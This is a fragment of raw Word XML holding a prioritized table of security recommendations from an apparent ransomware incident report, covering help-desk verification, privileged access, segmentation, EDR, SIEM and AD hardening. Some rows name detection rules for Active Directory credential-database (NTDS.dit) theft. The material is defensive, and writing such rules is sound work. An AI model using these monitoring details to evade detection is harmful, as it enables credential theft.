            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2668E6E3" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="216E4B0A" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="0051437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Policy only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F41776E" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Callback + shared secret + video-ID before any privileged reset. Directly targets confirmed initial access vector [1][7].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D8F84AA" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[1][7][23]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="3F63A515" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD8948B" w14:textId="6214B5AD" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C776D5" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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PAW + JIT Privileged Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C269728" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F81A1D7" w14:textId="03EDAEC7" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£20k – £80k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B2A7371" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Removes standing admin rights enabling lateral movement (T1021). Limits blast radius of stolen credentials [8].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269BBB0D" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[8][13]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="3C45129A" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC0FBC8" w14:textId="4F8A94F3" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="428809BD" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Zero Trust / Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EA68A8" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76BDDC6E" w14:textId="4F7C33E0" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£100k+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CBE5B46" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Prevents lateral spread from supply chain to core DC. Micro-segment POS, e-commerce, and DC tiers per Srikrishna [13].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DC07B3F" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[13][6]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="13FD5223" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E77B4E" w14:textId="128105B9" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B72459E" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Hypervisor-Layer EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E56F8D" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F5540F" w14:textId="3230A58D" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£30k – £100k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA68324" w14:textId="29B70613" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00096218"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Identifies DragonForce ESXi encryption (T1486). Install CrowdStrike Falcon on ESXi or VMware carbon black [9][26].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E01BEB1" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[9][26]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="695F7CCE" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7844C747" w14:textId="7BB6D5ED" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019DE256" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Third-Party Governance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2100B451" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33124E4F" w14:textId="5D9F6530" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£20k – £60k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60530B98" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Mandate Cyber Essentials+ for suppliers; least-privilege API access; annual TPRM assessments [6][8].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CF0B513" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[6][8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="3AE509B0" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F43E20D" w14:textId="3497F554" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A43BFD3" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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SIEM Anomaly Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5422D6D8" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57990A76" w14:textId="4C6731D2" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£15k – £50k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25334396" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Alert on NTDS.dit access outside backup windows; bulk SaaS exports; single account authenticating &gt;5 hosts [7][8].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AB4887D" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[7][8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="6BAD8C21" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FB17C73" w14:textId="7F95E853" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57004DF9" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Active Directory Hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BC2F96" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7A5712" w14:textId="49954E29" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£20k – £60k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6B359D" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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AD tier model; Protected Users group; monitor Event 4662 (NTDS.dit access); rotate privileged credentials [8][12].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF4AD69" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[8][12]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="6C42E970" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BE5B8E8" w14:textId="27E29030" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F3A447" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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IR Retainer + Playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BF20558" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EC3DABB" w14:textId="24DCF310" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£10k – £40k/yr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AAB2900" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Pre-contracted IR firm; tested ransomware playbooks covering isolation, communications, and recovery [8][28].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2350C283" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[8][28]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="612BB38B" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E026353" w14:textId="6E5A39CD" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA947E3" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Vishing Awareness Training</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2537960D" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6084283E" w14:textId="05BAC24F" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437F">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£5k – £20k/yr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4908C337" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Quarterly vishing simulations; train staff to challenge unexpected MFA prompts via secondary channels [7][23].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7035F603" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">
            <w:pPr>
              <w:jc w:val="center"/>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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[7][23]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6493CF69" w14:textId="09C5A304" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3: </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Prioritized</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD10829" w14:textId="77777777" w:rsidR="0097244F" w:rsidRPr="00C668B5" w:rsidRDefault="0097244F" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1588C8E9" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20AD32CE" wp14:editId="2E22104A">
            <wp:extent cx="5048250" cy="2133600"/>
            <wp:effectExtent l="76200" t="76200" r="133350" b="133350"/>
            <wp:docPr id="659234772" name="Picture 659234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rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect t="12157"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048250" cy="21336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a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
